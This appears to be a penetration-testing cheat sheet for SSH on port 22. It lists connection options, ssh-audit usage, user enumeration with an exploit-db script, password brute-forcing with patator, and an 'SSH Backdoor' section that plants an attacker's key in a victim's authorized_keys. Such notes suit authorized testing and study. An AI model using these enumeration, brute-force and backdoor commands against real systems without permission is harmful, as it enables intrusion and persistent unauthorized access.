Port 22 - SSH
Connection
ssh root@192.168.142.154 # password
ssh -i root_key root@192.168.142.154 # public/privatekey
# troubleshooting - v: verbose
ssh -v 192.168.1.94
# bypass /usr/bin/nologin or /usr/bin/false
ssh -v noraj@192.168.1.94 /bin/bash
# Force auth method
ssh -v 192.168.1.94 -o PreferredAuthentications=password
# Disable strict host key checking (unknown host keys are accepted without confirmation, so the server's identity is not verified)
ssh -v -o StrictHostKeychecking=no -i id_rsa <user>@<ip>
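# When attempting to SSH, the SSH client displays "Unable to negotiate with <IP address> port 22: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1". The option below re-enables this legacy key exchange, which modern OpenSSH clients disable by default because it is weak.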
ssh j0hn@10.11.1.252 -p 22 -oKexAlgorithms=+diffie-hellman-group1-sha1
SSH Audit
# When you need to debug an SSH connection and understand how the server is configured, run the following command. The tool is a bit old.
https://github.com/arthepsy/ssh-audit
ssh-audit 192.168.1.94
SSH Keys
id_rsa # private key
id_rsa.pub # public key
authorized_keys # a list of public keys stored on the server
User Enumeration
python /usr/share/exploitdb/exploits/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip
Brute-force SSH password
patator ssh_login host=sunday.htb port=22 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/probable-v2-top1575.txt persistent=0
SSH Backdoor
# Attacker
ssh-keygen -f <FILENAME>
chmod 600 <FILENAME>
cat <FILENAME>.pub -> copy
# Victim
echo <FILENAME>.pub >> <PATH>/.ssh/authorized_keys
# Connect
ssh -i <FILENAME> <USER>@<IP>
Services to stop and start
# Enable the service
sudo systemctl enable ssh
# Check the status of the service and restart it
sudo service ssh status
sudo service ssh restart
# Another way to start the service
sudo systemctl start ssh
# Find the listening sshd process
sudo ss -antlp | grep sshd